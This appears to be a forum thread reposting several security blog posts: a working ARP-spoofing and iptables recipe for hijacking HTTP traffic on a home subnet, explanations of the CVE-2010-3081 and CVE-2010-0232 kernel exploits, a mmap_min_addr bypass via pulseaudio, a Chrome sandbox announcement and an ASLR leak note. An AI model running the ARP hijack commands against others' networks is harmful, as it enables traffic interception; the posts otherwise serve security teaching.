nano is an easy-to-use text editor originally designed as a replacement for Pico, the ncurses-based editor from the non-free mailer package Pine (itself now available under the Apache License as Alpine). . However, nano also implements many features missing in pico, including: - feature toggles; - interactive search and replace (with regular expression support); - go to line (and column) command; - auto-indentation and color syntax-highlighting;apt debian dpkg package-management - filename tab-completion and support for multiple buffers; - full internationalization support. If the package format ever changes again, dpkg-deb will too, and you won't even need to notice. ~spang Sursa: https://blogs.oracle.com/ksplice/entry/anatomy_of_a_debian_package
  4. Stiu partea de vBulletin, trebuie sa vad care-i faza cu comment-urile pe Wordpress.
  5. Hijacking HTTP traffic on your home subnet using ARP and iptables By Ksplice Post Importer on Sep 29, 2010 Let's talk about how to hijack HTTP traffic on your home subnet using ARP and iptables. It's an easy and fun way to harass your friends, family, or flatmates while exploring the networking protocols. Please don't experiment with this outside of a subnet under your control -- it's against the law and it might be hard to get things back to their normal state. The setup Significant other comes home from work. SO pulls out laptop and tries to catch up on social media like every night. SO instead sees awesome personalized web page proposing marriage: How do we accomplish this? The key player is ARP, the "Address Resolution Protocol" responsible for associating Internet Layer addresses with Link Layer addresses. This usually means determining the MAC address corresponding to a given IP address. ARP comes into play when you, for example, head over to a friend's house, pull out your laptop, and try to use the wireless to surf the web. One of the first things that probably needs to happen is determining the MAC address of the gateway (probably your friend's router), so that the Ethernet packets containing all those IP[TCP[HTTP]] requests you want to send out to the Internet know how to get to their first hop, the gateway. Your laptop finds out the MAC address of the gateway by asking. It broadcasts an ARP request for "Who has IP address 192.168.1.1", and the gateway broadcasts an ARP response saying "I have 192.168.1.1, and my MAC address is xx:xx:xx:xx:xx:xx". Your laptop, armed with the MAC address of the gateway, can then craft Ethernet packets that will go to the gateway and get routed out to the Internet. But the gateway didn't really have to prove who it was. It just asserted who it was, and everyone listened. Anyone else can send an ARP response claiming to have IP address 192.168.1.1. And that's the ticket: if you can pretend to be the gateway, you can control all the packets that get routed through the gateway and the content returned to clients. Step 1: The layout I did this at home. The three machines involved were: real gateway router: IP address 192.168.1.1, MAC address 68:7f:74:9a:f4:ca fake gateway: a desktop called kid-charlemagne, IP address 192.168.1.200, MAC address 00:30:1b:47:f2:74 test machine getting duped: a laptop on wireless called pixeleen, IP address 192.168.1.111, MAC address 00:23:6c:8f:3f:95 The gateway router, like most modern routers, is bridging between the wireless and wired domains, so ARP packets get broadcast to both domains. Step 2: Enable IPv4 forwarding kid-charlemagne wants to be receiving packets that aren't destined for it (eg the web traffic). Unless IP forwarding is enabled, the networking subsystem is going to ignore packets that aren't destined for us. So step 1 is to enable IP forwarding. All that takes is a non-zero value in /proc/sys/net/ipv4/ip_forward: root@kid-charlemagne:~# echo 1 > /proc/sys/net/ipv4/ip_forward Step 3: Set routing rules so packets going through the gateway get routed to you kid-charlemagne is going to act like a little NAT. For HTTP packets heading out to the Internet, kid-charlemagne is going to rewrite the destination address in the IP packet headers to be its own IP address, so it becomes final destination for the web traffic: For HTTP packets heading back from kid-charlemagne to the client, it'll rewrite the source address to be that of the original destination out on the Internet. We can set up this routing rule with the following iptables command: jesstess@kid-charlemagne:~$ sudo iptables -t nat -A PREROUTING \ > -p tcp --dport 80 -j NETMAP --to 192.168.1.200 The iptables command has 3 components: When to apply a rule (-A PREROUTING) What packets get that rule (-p tcp --dport 80) The actual rule (-t nat ... -j NETMAP --to 192.168.1.200) When -t says we're specifying a table. The nat table is where a lookup happens on packets that create new connections. The nat table comes with 3 built-in chains: PREROUTING, OUTPUT, and POSTROUTING. We want to add a rule in the PREROUTING chain, which will alter packets right as they come in, before routing rules have been applied. What packets That PREROUTING rule is going to apply to TCP packets destined for port 80 (-p tcp --dport 80), aka HTTP traffic. For packets that match this filter, jump (-j) to the following action: The rule If we receive a packet heading for some destination, rewrite the destination in the IP header to be 192.168.1.200 (NETMAP --to 192.168.1.200). Have the nat table keep a mapping between the original destination and rewritten destination. When a packet is returning through us to its source, rewrite the source in the IP header to be the original destination. In summary: "If you're a TCP packet destined for port 80 (HTTP traffic), actually make my address, 192.168.1.200, the destination, NATting both ways so this is transparent to the source." One last thing: The networking subsystem will not allow you to ARP for a random IP address on an interface -- it has to be an IP address actually assigned to that interface, or you'll get a bind error along the lines of "Cannot assign requested address". We can handle this by adding an ip entry on the interface that is going to send packets to pixeleen, the test client. kid-charlemagne is wired, so it'll be eth0. jesstess@kid-charlemagne:~$ sudo ip addr add 192.168.1.1/24 dev eth0 We can check our work by listing all our interfaces' addresses and noting that we now have two IP addresses for eth0, the original IP address 192.168.1.200, and the gateway address 192.168.1.1. jesstess@kid-charlemagne:~$ ip addr ... 3: eth0: mtu 1500 qdisc noqueue state UNKNOWN link/ether 00:30:1b:47:f2:74 brd ff:ff:ff:ff:ff:ff inet 192.168.1.200/24 brd 192.168.1.255 scope global eth0 inet 192.168.1.1/24 scope global secondary eth0 inet6 fe80::230:1bff:fe47:f274/64 scope link valid_lft forever preferred_lft forever ... Step 4: Set yourself up to respond to HTTP requests kid-charlemagne happens to have Apache set up. You could run any minimalist web server that would, given a request for an arbitrary resource, do something interesting. Step 5: Test pretending to be the gateway At this point, kid-charlemagne is ready to pretend to be the gateway. The trouble is convincing pixeleen that the MAC address for the gateway has changed, to that of kid-charlemagne. We can do this by sending a Gratuitous ARP, which is basically a packet that says "I know nobody asked, but I have the MAC address for 192.168.1.1”. Machines that hear that Gratuitous ARP will replace an existing mapping from 192.168.1.1 to a MAC address in their ARP caches with the mapping advertised in that Gratuitous ARP. We can look at the ARP cache on pixeleen before and after sending the Gratuitous ARP to verify that the Gratuitious ARP is working. pixeleen’s ARP cache before the Gratuitous ARP: jesstess@pixleen$ arp -a ? (192.168.1.1) at 68:7f:74:9a:f4:ca on en1 ifscope [ethernet] ? (192.168.1.200) at 0:30:1b:47:f2:74 on en1 ifscope [ethernet] 68:7f:74:9a:f4:ca is the MAC address of the real gateway router. There are lots of command line utilities and bindings in various programming language that make it easy to issue ARP packets. I used the arping tool: jesstess@kid-charlemagne:~$ sudo arping -c 3 -A -I eth0 192.168.1.1 We'll send a Gratuitous ARP reply (-A), three times (-c -3), on the eth0 interface (-l eth0) for IP address 192.168.1.1. As soon as we generate the Gratuitous ARPs, if we check pixeleen’s ARP cache: jesstess@pixeleen$ arp -a ? (192.168.1.1) at 0:30:1b:47:f2:74 on en1 ifscope [ethernet] ? (192.168.1.200) at 0:30:1b:47:f2:74 on en1 ifscope [ethernet] Bam. pixeleen now thinks the MAC address for IP address 192.169.1.1 is 0:30:1b:47:f2:74, which is kid-charlemagne’s address. If I try to browse the web on pixeleen, I am served the resource matching the rules in kid-charlemagne’s web server. We can watch this whole exchange in Wireshark: First, the Gratuitous ARPs generated by kid-charlemagne: The only traffic getting its headers rewritten so that kid-charlemagne is the destination is HTTP traffic: TCP traffic on port 80. That means all of the non-HTTP traffic associated with viewing a web page still happens as normal. In particular, when kid-charlemagne gets the DNS resolution requests for lycos.com, the test site I visited, it will follow its routing rules and forward them to the real router, which will send them out to the Internet: The HTTP traffic gets served by kid-charlemagne: Note that the HTTP request has a source IP of 192.168.1.111, pixeleen, and a destination IP of 209.202.254.14, which dig -x 209.202.254.14 +short tells us is search-core1.bo3.lycos.com. The HTTP response has a source IP of 209.202.254.14 and a destination IP of 192.168.1.111. The fact that kid-charlemagne has rerouted and served the request is totally transparent to the client at the IP layer. Step 6: Deploy against friends and family I trust you to get creative with this. Step 7: Reset everything to the normal state To get the normal gateway back in control, delete the IP address from the interface on kid-charlemagne and delete the iptables routing rule: jesstess@kid-charlemagne:~$ sudo ip addr delete 192.168.1.1/24 dev eth0 jesstess@kid-charlemagne:~$ sudo iptables -t nat -D PREROUTING -p tcp --dport 80 -j NETMAP --to 192.168.1.200 To get the client machines to believe the router is the real gateway, you might have to clear the gateway entry from the ARP cache with arp -d 192.168.1.1, or bring your interfaces down and back up. I can verify that my TiVo corrected itself quickly without any intervention, but I won't make any promises about your networked devices. In summary That was a lot of explanatory text, but the steps required to hijack the HTTP traffic on your home subnet can be boiled down to: enabled IP forwarding: echo 1 > /proc/sys/net/ipv4/ip_forward set your routing rule: iptables -t nat -A PREROUTING -p tcp --dport 80 -j NETMAP --to 192.168.1.200 add the gateway IP address to the appropriate interface: ip addr add 192.168.1.1/24 dev eth0 ARP for the gateway MAC address: arping -c 3 -A -I eth0 192.168.1.1 substituting the appropriate IP address and interface information and tearing down when you're done. And that's all there is to it! This has been tested as working in a few environments, but it might not work in yours. I'd love to hear the details on if this works, works with modifications, or doesn't work (because the devices are being too clever about Gratuitous ARPs, or otherwise) in the comments. --> Huge thank-you to fellow experimenter adamf. <--- ~jesstess Sursa: https://blogs.oracle.com/ksplice/entry/hijacking_http_traffic_on_your
  6. [h=3]Anatomy of an exploit: CVE-2010-3081[/h][h=4]By Ksplice Post Importer on Sep 22, 2010[/h]It has been an exciting week for most people running 64-bit Linux systems. Shortly after "Ac1dB1tch3z" released his or her exploit of the vulnerability known as CVE-2010-3081, we saw this exploit aggressively compromising machines, with reports of compromises all over the hosting industry and many machines using our diagnostic tool and testing positive for the backdoors left by the exploit. The talk around the exploit has mostly been panic and mitigation, though, so now that people have had time to patch their machines and triage their compromised systems, what I'd like to do for you today is talk about how this bug worked, how the exploit worked, and what we can learn about Linux security. [h=3]The Ingredients of an Exploit[/h] There are three basic ingredients that typically go into a kernel exploit: the bug, the target, and the payload. The exploit triggers the bug -- a flaw in the kernel -- to write evil data corrupting the target, which is some kernel data structure. Then it prods the kernel to look at that evil data and follow it to run the payload, a snippet of code that gives the exploit the run of the system. The bug is the one ingredient that is unique to a particular vulnerability. The target and the payload may be reused by an attacker in exploits for other vulnerabilities -- if 'Ac1dB1tch3z' didn't copy them already from an earlier exploit, by himself or by someone else, he or she will probably reuse them in future exploits. Let's look at each of these in more detail. [h=3]The Bug: CVE-2010-3081[/h] An exploit starts with a bug, or vulnerability, some kernel flaw that allows a malicious user to make a mess -- to write onto its target in the kernel. This bug is called CVE-2010-3081, and it allows a user to write a handful of words into memory almost anywhere in the kernel. The bug was present in Linux's 'compat' subsystem, which is used on 64-bit systems to maintain compatibility with 32-bit binaries by providing all the system calls in 32-bit form. Now Linux has over 300 different system calls, so this was a big job. The Linux developers made certain choices in order to keep the task manageable: We don't want to rewrite the code that actually does the work of each system call, so instead we have a little wrapper function for compat mode. The wrapper function needs to take arguments from userspace in 32-bit form, then put them in 64-bit form to pass to the code that does the system call's work. Often some arguments are structs which are laid out differently in the 32-bit and 64-bit worlds, so we have to make a new 64-bit struct based on the user's 32-bit struct. The code that does the work expects to find the struct in the user's address space, so we have to put ours there. Where in userspace can we find space without stepping on toes? The compat subsystem provides a function to find it on the user's stack. Now, here's the core problem. That allocation routine went like this: static inline void __user *compat_alloc_user_space(long len) { struct pt_regs *regs = task_pt_regs(current); return (void __user *)regs->sp - len; } The way you use it looks a lot like the old familiar malloc(), or the kernel's kmalloc(), or any number of other memory-allocation routines: you pass in the number of bytes you need, and it returns a pointer where you are supposed to read and write that many bytes to your heart's content. But it comes -- came -- with a special catch, and it's a big one: before you used that memory, you had to check that it was actually OK for the user to use that memory, with the kernel's access_ok() function. If you've ever helped maintain a large piece of software, you know it's inevitable that someone will eventually be fooled by the analogy, miss the incongruence, and forget that check. Fortunately the kernel developers are smart and careful people, and they defied that inevitability almost everywhere. Unfortunately, they missed it in at least two places. One of those is this bug. If we call getsockopt() in 32-bit fashion on the socket that represents a network connection over IP, and pass an optname of MCAST_MSFILTER, then in a 64-bit kernel we end up in compat_mc_getsockopt(): int compat_mc_getsockopt(struct sock *sock, int level, int optname, char __user *optval, int __user *optlen, int (*getsockopt)(struct sock *,int,int,char __user *,int __user *)) { This function calls compat_alloc_user_space(), and it fails to check the result is OK for the user to access -- and by happenstance the struct it's making room for has a variable length, supplied by the user. So the attacker's strategy goes like so: Make an IP socket in a 32-bit process, and call getsockopt() on it with optname MCAST_MSFILTER. Pass in a giant length value, almost the full possible 2GB. Because compat_alloc_user_space() finds space by just subtracting the length from the user's stack pointer, with a giant length the address wraps around, down past zero, to where the kernel lives at the top of the address space. When the bug fires, the kernel will copy the original struct, which the attacker provides, into the space it has just 'allocated', starting at that address up in kernel-land. So fill that struct with, say, an address for evil code. Tune the length value so that the address where the 'new struct' lives is a particularly interesting object in the kernel, a target. The fix for CVE-2010-3081 was to make compat_alloc_user_space() call access_ok() to check for itself. More technical details are ably explained in the original report by security researcher Ben Hawkes, who brought the vulnerability to light. [h=3]The Target: Function Pointers Everywhere[/h] The target is some place in the kernel where if we make the right mess, we can leverage that into the kernel running the attacker's code, the payload. Now the kernel is full of function pointers, because secretly it's object oriented. So for example the attacker may poke some userspace object like a special file to cause the kernel to invoke a certain method on it -- and before doing so will target that method's function pointer in the object's virtual method table (called an "ops struct" in kernel lingo) which says where to find all the methods, scribbling over it with the address of the payload. A key constraint for the attacker is to pick something that will never be used in normal operation, so that nothing goes awry to catch the user's attention. This exploit uses one of three targets: the interrupt descriptor table, timer_list_fops, and the LSM subsystem. The interrupt descriptor table (IDT) is morally a big table of function pointers. When an interrupt happens, the hardware looks it up in the IDT, which the kernel has set up in advance, and calls the handler function it finds there. It's more complicated than that because each entry in the table also needs some metadata to say who's allowed to invoke the interrupt, whether the handler should be called with user or kernel privileges, etc. This exploit picks interrupt number 221, higher than anybody normally uses, and carefully sets up that entry in the IDT so that its own evil code is the handler and runs in kernel mode. Then with the single instruction int $221, it makes that interrupt happen. timer_list_fops is the "ops struct" or virtual method table for a special file called /proc/timer_list. Like many other special files that make up the proc filesystem, /proc/timer_list exists to provide kernel information to userspace. This exploit scribbles on the pointer for the poll method, which is normally not even provided for this file (so it inherits a generic behavior), and which nobody ever uses. Then it just opens that file and calls poll(). I believe this could just as well have been almost any file in /proc/. The LSM approach attacks several different ops structs of type security_operations, the tables of methods for different 'Linux security modules'. These are gigantic structs with hundreds of function pointers; the one the exploit targets in each struct is msg_queue_msgctl, the 100th one. Then it issues a msgctl system call, which causes the kernel to check whether it's authorized by calling the msg_queue_msgctl method... which is now the exploit's code. Why three different targets? One is enough, right? The answer is flexibility. Some kernels don't have timer_list_fops. Some kernels have it, but don't make available a symbol to find its address, and the address will vary from kernel to kernel, so it's tricky to find. Other kernels pose the same obstacle with the security_operations structs, or use a different security_operations than the ones the exploit corrupts. Different kernels offer different targets, so a widely applicable exploit has to have several targets in its repertoire. This one picks and chooses which one to use depending on what it can find. [h=3]The Payload: Steal Privileges[/h] Finally, once the bug is used to corrupt the target and the target is triggered, the kernel runs the attacker's payload, or shellcode. A simple exploit will run the bare minimum of code inside the kernel, because it's much easier to write code that can run in userspace than in kernelspace -- so it just sets the process up to have the run of the system, and then returns. This means setting the process's user ID to 0, root, so that everything else it does is with root privileges. A process's user ID is stored in different places in different kernel versions -- the system became more complicated in 2.6.29, and again in 2.6.30 -- so the exploit needs to have flexibility again. This one checks the version with uname and assembles the payload accordingly. This exploit can also clear a couple of flags to turn off SELinux, with code it optionally includes in the payload -- more flexibility. Then it lets the kernel return to userspace, and starts a root shell. In a real attack, that root shell might be used to replace key system binaries, steal data, start a botnet daemon, or install backdoors on disk to cement the attacker's control and hide their presence. [h=3]Flexibility, or, You Can't Trust a Failing Exploit[/h] All the points of flexibility in this exploit illustrate a key lesson: you can't determine you're vulnerable just because an exploit fails. For example, on a Fedora 13 system, this exploit errors out with a message like this: $ ./ABftw Ac1dB1tCh3z VS Linux kernel 2.6 kernel 0d4y $$$ Kallsyms +r $$$ K3rn3l r3l3as3: 2.6.34.6-54.fc13.i686 [...] !!! Err0r 1n s3tt1ng cr3d sh3llc0d3z Sometimes a system administrator sees an exploit fail like that and concludes they're safe. "Oh, Red Hat / Debian / my vendor says I'm vulnerable", they may say. "But the exploit doesn't work, so they're just making stuff up, right?" Unfortunately, this can be a fatal mistake. In fact, the machine above is vulnerable. The error message only comes about because the exploit can't find the symbol per_cpu__current_task, whose value it needs in the payload; it's the address at which to find the kernel's main per-process data structure, the task_struct. But a skilled attacker can find the task_struct without that symbol, by following pointers from other known data structures in the kernel. In general, there is almost infinitely much work an exploit writer could put in to make the exploit function on more and more kernels. Use a wider repertoire of targets; find missing symbols by following pointers or by pattern-matching in the kernel; find missing symbols by brute force, with a table prepared in advance; disable SELinux, as this exploit does, or grsecurity; or add special code to navigate the data structures of unusual kernels like OpenVZ. If the bug is there in a kernel but the exploit breaks, it's only a matter of work or more work to extend the exploit to function there too. That's why the only way to know that a given kernel is not affected by a vulnerability is a careful examination of the bug against the kernel's source code and configuration, and never to rely on a failing exploit -- and even that examination can sometimes be mistakenly optimistic. In practice, for a busy system administrator this means that when the vendor recommends you update, the only safe choice is to update. ~price Sursa: https://blogs.oracle.com/ksplice/entry/anatomy_of_an_exploit_cve
  7. [h=3]Introducing Chrome's next-generation Linux sandbox[/h]Thursday, September 6, 2012 Starting with Chrome 23.0.1255.0, recently released to the Dev Channel, you will see Chrome making use of our next-generation sandbox on Linux and ChromeOS for renderers. We are using a new facility, introduced in Linux 3.5 and developed by Will Drewry called Seccomp-BPF. Seccomp-BPF builds on the ability to send small BPF (for BSD Packet Filter) programs that can be interpreted by the kernel. This feature was originally designed for tcpdump, so that filters could directly run in the kernel for performance reasons. BPF programs are untrusted by the kernel, so they are limited in a number of ways. Most notably, they can't have loops, which bounds their execution time by a monotonic function of their size and allows the kernel to know they will always terminate. With Seccomp-BPF, BPF programs can now be used to evaluate system call numbers and their parameters. This is a huge change for sandboxing code in Linux, which, as you may recall, has been very limited in this area. It's also a change that recognizes and innovates in two important dimensions of sandboxing: Mandatory access control versus "discretionary privilege dropping". Something I always felt strongly about and have discussed before. Access control semantics, versus attack surface reduction. Let's talk about the second topic. Having a nice, high level, access control semantics is appealing and, one may argue, necessary. When you're designing a sandbox for your application, you may want to say things such as: I want this process to have access to this subset of the file system. I want this process to be able to allocate or de-allocate memory. I want this process to be able to interfere (debug, send signals) with this set of processes. The capabilities-oriented framework Capsicum takes such an approach. This is very useful. However, with such an approach it's difficult to assess the kernel's attack surface. When the whole kernel is in your trusted computing base "you're going to have a bad time", as a colleague recently put it. Now, in that same dimension, at the other end of the spectrum, is the "attack surface reduction" oriented approach. The approach where you're close to the ugly guts of implementation details, the one taken by Seccomp-BPF. In that approach, read()+write() and vmsplice() are completely different beasts, because you're not looking at their semantics, but at the attack surface they open in the kernel. They perform similar things, but perhaps ihaquer will have a harder time exploiting read()/write() on pipes than vmsplice(). Semantically, uselib() seems to be a subset of open() + mmap(), but similarly, the attack surface is different. The drawback of course is that implementing particular sandbox semantics with such a mechanism looks ugly. For instance, let's say you want to allow opening any file in /public from within the sandbox, how would you implement that in seccomp-BPF? Well, first you need to understand what set of system calls would be concerned by such an operation. That's not just open(), but also openat() (an ugly implementation-level detail, some libc will happily use openat() with AT_FDCWD instead of open(). Then you realize that a BPF program in the kernel will only see a pointer to the file name, so you can't filter on that (even if you could dereference pointers in BPF programs, it wouldn't be safe to do so, because an attacker could create another thread that would modify the file name after it was evaluated by the BPF program, so the kernel would also need to copy it in a safe location). In the end, what you need to do is have a trusted helper process (or broker) that runs unsandboxed for this particular set of system calls and have it accept requests to open files over an IPC channel, have it make the security decision and send the file descriptor back over an IPC. (If you're interested in that sort of approach, pushed to the extreme, look at Markus Gutschke's original seccomp mode 1 sandbox.) That's tedious but doable. In comparison, Capsicum would make this a breeze. There are other issues with such a low-level approach. By filtering system calls, you're breaking the kernel API. This means that third party code (such as libraries) you include in your address space can break. For this reason, I suggested to Will to implement an "exception" mechanism through signals, so that special handlers can be called when system calls are denied. Such handlers are now used and can for instance "broker out" system calls such as open(). In my opinion, the Capsicum and Seccomp-BPF approach are trade-offs, each on the other end of the spectrum. Having both would be great. We could stack one on top of the other and have the best of both worlds. In a similar, but very limited, fashion, this is what we have now in Chrome: we stacked the seccomp-bpf sandbox on top of the setuid sandbox. The setuid sandbox gives a few easy to understand semantic properties: no file system access, no process access outside of the sandbox, no network access. It makes it much easier to layer a seccomp-bpf sandbox on top. Several people besides myself have worked on making this possible. In particular: Chris Evans, Jorge Lucangeli Obes, Markus Gutschke, Adam Langley (and others who made Chrome sandboxable under the setuid sandbox in the first place) and of course, for the actual kernel support, Will Drewry and Kees Cook. We will continue to work on improving and tightening this new sandbox, this is just a start. Please give it a try, and report any bugs to crbug.com (feel free to cc: jln at chromium.org directly). PS: to make sure that you have kernel support for seccomp BPF, use Linux 3.5 or Ubuntu 12.04. Check about:sandbox in Chrome 22+ and see if Seccomp-BPF is enabled). Also make sure you're using the 64 bits version of Chrome. Posted by Julien Tinnes at 5:21 PM Sursa: cr0 blog: Introducing Chrome's next-generation Linux sandbox
  8. [h=3]CVE-2010-0232: Microsoft Windows NT #GP Trap Handler Allows Users to Switch Kernel Stack[/h]Thursday, January 21, 2010 Two days ago, Tavis Ormandy has published one of the most interesting vulnerabilities I've seen so far. It's one of those rare, but fascinating design-level errors dealing with low-level system internals. Its exploitation requires skills and ingenuity. The vulnerability lies in Windows' support for Intel's hardware 8086 emulation support (virtual-8086, or VM86) and is believed to have been there since Windows NT 3.1 (1993!), making it 17 years old. It uses two tricks that we have already published on this blog before, the #GP on pre-commit handling failure and the forging of cs:eip in VM86 mode. This was intended to be mentioned in our talk at PacSec about virtualization this past November, but Tavis had agreed with Microsoft to postpone the release of this advisory. Tavis was kind enough to write a blog post about it, you can read it below: From Tavis Ormandy: I've just published one of the most interesting bugs I've ever encountered, a simple authentication check in Windows NT that can incorrectly let users take control of the system. The bug exists in code hidden deep enough inside the kernel that it's gone unnoticed for as long as NT has existed. If you've ever tried to run an MS-DOS or Win16 application on a modern NT machine, the chances are it worked. This is an impressive feat, these applications were written for a completely different execution environment and operating system, and yet still work today and run at almost native speed. The secret that makes this possible behind the scenes is Virtual-8086 mode. Virtual-8086 mode is a hardware emulation facility built into all x86 processors since the i386, and allows modern operating systems to run 16-bit programs designed for real mode with very little overhead. These 16-bit programs run in a simulated real mode environment within a regular protected mode task, allowing them to co-exist in a modern multitasking environment. Support for Virtual-8086 mode requires a monitor, the collective name for the software that handles any requests the program makes. These requests range from handling sensitive instructions to mapping low-level services onto system calls and are implemented partially in kernel mode and partially in user mode. In Windows NT, the user mode component is called the NTVDM subsystem, and it interacts with the kernel via a native system service called NtVdmControl. NtVdmControl is unusual because it's authenticated, only authorised programs are permitted to access it, which is enforced using a special process flag called VdmAllowed which the kernel verifies is present before NtVdmControl will perform any action; if you don't have this flag, the kernel will always return STATUS_ACCESS_DENIED. The bug we're talking about today involves how BIOS service calls are handled, which are a low level way of interacting with the system that's needed to support real-mode programs. The kernel implements BIOS service calls in two stages, the second stage begins when the interrupt handler for general protection faults (often shortened to #GP in technical documents) detects that the system has completed the first stage. The details of how BIOS service calls are implemented are unimportant, what is important is that the two stages must be perfectly synchronised, if the kernel transitions to the second stage incorrectly, a hostile user can take advantage of this confusion to take control of the kernel and compromise the system. In theory, this shouldn't be a problem, Microsoft implemented a check that verifies that the trap occurred at a magic address (actually, a cs:eip pair) that unprivileged users can't reach. The check seems reasonable at first, the hardware guarantees that unprivileged code can't arbitrarily make itself more privileged without a special request, and even if it could, only authorised programs are permitted to use NtVdmControl() anyway. Unfortunately, it turns out these assumptions were wrong. The problem I noticed was that although unprivileged code cannot make itself more privileged arbitrarily, Virtual-8086 mode makes testing the privilege level of code more difficult because the segment registers lose their special meaning. This is because In protected mode, the segment registers (particularly ss and cs) can be used to test privilege level, however in Virtual-8086 mode they're used to create far pointers, which allow 16-bit programs to access the 20-bit real address space. However, I still couldn't abuse this fact because NtVdmControl() can only be accessed by authorised programs, and there's no other way to request pathological operation on Virtual-8086 mode tasks. I was able to solve this problem by invoking the real NTVDM subsystem, and then loading my own code inside it using a combination of CreateRemoteThread(), VirtualAllocEx() and WriteProcessMemory(). Finally, I needed to find a way to force the kernel to transition to the vulnerable code while my process appeared to be privileged. My solution to this was to make the kernel fault when returning to user mode from kernel mode, thus creating the appearance of a legitimate trap for the fabricated execution context that I had installed. These steps all fit together perfectly, and can be used to convince the kernel to execute my code, giving me complete control of the system. Conclusion Could Microsoft have avoided this issue? It's difficult to imagine how, errors like this will generally elude fuzz testing (In order to observe any problem, a fuzzer would need to guess a 46-bit magic number, as well as setup an intricate process state, not to mention the VdmAllowed flag), and any static analysis would need an incredibly accurate model of the Intel architecture. The code itself was probably resistant to manual audit, it's remained fairly static throughout the history of NT, and is likely considered forgotten lore even inside Microsoft. In cases like this, security researchers are sometimes in a better position than those with the benefit of documentation and source code, all abstraction is stripped away and we can study what remains without being tainted by how documentation claims something is supposed to work. If you want to mitigate future problems like this, reducing attack surface is always the key to security. In this particular case, you can use group policy to disable support for Application Compatibility (see the Application Compatability policy template) which will prevent unprivileged users from accessing NtVdmControl(), certainly a wise move if your users don't need MS-DOS or Windows 3.1 applications. Posted by Julien Tinnes at 7:48 AM Sursa: cr0 blog: CVE-2010-0232: Microsoft Windows NT #GP Trap Handler Allows Users to Switch Kernel Stack
  9. [h=3]Bypassing Linux' NULL pointer dereference exploit prevention (mmap_min_addr)[/h]Friday, June 26, 2009 EDIT3: Slashdot, the SANS Institute, Threatpost and others have a story about an exploit by Bradley Spengler which uses our technique to exploit a null pointer dereference in the Linux kernel. EDIT2: As of July 13th 2009, the Linux kernel integrates our patch (2.6.31-rc3). Our patch also made it into -stable. EDIT1: This is now referenced as a vulnerability and tracked as CVE-2009-1895 NULL pointers dereferences are a common security issue in the Linux kernel. In the realm of userland applications, exploiting them usually requires being able to somehow control the target's allocations until you get page zero mapped, and this can be very hard. In the paradigm of locally exploiting the Linux kernel however, nothing (before Linux 2.6.23) prevented you from mapping page zero with mmap() and crafting it to suit your needs before triggering the bug in your process' context. Since the kernel's data and code segment both have a base of zero, a null pointer dereference would make the kernel access page zero, a page filled with bytes in your control. Easy. This used to not be the case, back in Linux 2.0 when the kernel's data segment's base was above PAGE_OFFSET and the kernel had to explicitely use a segment override (with the fs selector) to access data in userland. The same rough idea is now used in PaX/GRSecurity's UDEREF to prevent exploitation of "unexpected to userland kernel accesses" (it actually makes use of an expand down segment instead of a PAGE_OFFSET segment base, but that's a detail). Kernel developpers tried to solve this issue too, but without resorting to segmentation (which is considered deprecated and is mostly not available on x86_64) and in a portable (cross architectures) way. In 2.6.23, they introduced a new sysctl, called vm.mmap_min_addr, that defines the minimum address that you can request a mapping at. Of course, this doesn't solve the complete issue of "to userland pointer dereferences" and it also breaks the somewhat useful feature of being able to map the first pages (this breaks Dosemu for instance), but in practice this has been effective enough to make exploitation of many vulnerabilities harder or impossible. Recently, Tavis Ormandy and myself had to exploit such a condition in the Linux kernel. We investigated a few ideas, such as: using brk() creating a MAP_GROWSDOWN mapping just above the forbidden region (usually 64K) and segfaulting the last page of the forbidden region obscure system calls such as remap_file_pages putting memory pressure in the address space to let the kernel allocate in this region using the MAP_PAGE_ZERO personality All of them without any luck at first. The LSM hook responsible for this security check was correctly called every time. So what does the default security module do in cap_file_mmap? This is the relevant code (in security/capability.c on recent versions of the Linux kernel): if ((addr < mmap_min_addr) && !capable(CAP_SYS_RAWIO)) return -EACCES; return 0; Meaning that a process with CAP_SYS_RAWIO can bypass this check. How can we get our process to have this capability ? By executing a setuid binary of course! So we set the MMAP_PAGE_ZERO personality and execute a setuid binary. Page zero will get mapped, but the setuid binary is executing and we don't have control anymore. So, how do we get control back ? Using something such as "/bin/su our_user_name" could be tempting, but while this would indeed give us control back, su will drop privileges before giving us control back (it'd be a vulnerability otherwise!), so the Linux kernel will make exec fail in the cap_file_mmap check (due to the MMAP_PAGE_ZERO personality). So what we need is a setuid binary that will give us control back without going through exec. We found such a setuid binary that is installed on many Desktop Linux machines by default: pulseaudio. pulseaudio will drop privileges and let you specify a library to load though its -L argument. Exactly what we needed! Once we have one page mapped in the forbidden area, it's game over. Nothing will prevent us from using mremap to grow the area and mprotect to change our access rights to PROT_READ|PROT_WRITE|PROT_EXEC. So this completely bypasses the Linux kernel's protection. Note that apart from this problem, the mere fact that MMAP_PAGE_ZERO is not in the PER_CLEAR_ON_SETID mask and thus is allowed when executing setuid binaries can be a security issue: being able to map page zero in a process with euid=0, even without controlling its content could be useful when exploiting a null pointer vulnerability in a setuid application. We believe that the correct fix for this issue is to add MMAP_PAGE_ZERO to the PER_CLEAR_ON_SETID mask. PS: Thanks to Robert Swiecki for some help while investigating this. Posted by Julien Tinnes at 11:37 AM Sursa: cr0 blog: Bypassing Linux' NULL pointer dereference exploit prevention (mmap_min_addr)
  10. [h=3]Local bypass of Linux ASLR through /proc information leaks[/h]Wednesday, April 22, 2009 EDIT2: Thanks to the efforts of Jake Edge who noticed our presentation, /proc/pid/stat information leak is now at least partially patched in mainline kernel, since 2.6.27.23 EDIT1: This is featured in an LWN article by Jake Edge Tavis Ormandy and myself talked about locally bypassing address space layout randomization (ASLR) in Linux in a lightning talk at CanSecWest. From Linux 2.6.12 to Linux 2.6.21, you could completely bypass ASLR when targeting local processes by reading /proc/pid/maps. Since Linux 2.6.22, if you cannot ptrace "pid", then you will see an empty /proc/pid/maps. It has been known for at least 7 years now that /proc/pid/stat and /proc/pid/wchan could also leak sensitive information. Reading this information has been prevented in GRSecurity since the beginning as well as in this patch. The question was: could you exploit this information to bypass ASLR in practice? If you want to find out, it's easy: we've just published the slides and Tavis' tool! Posted by Julien Tinnes at 4:21 PM Sursa: cr0 blog: Local bypass of Linux ASLR through /proc information leaks
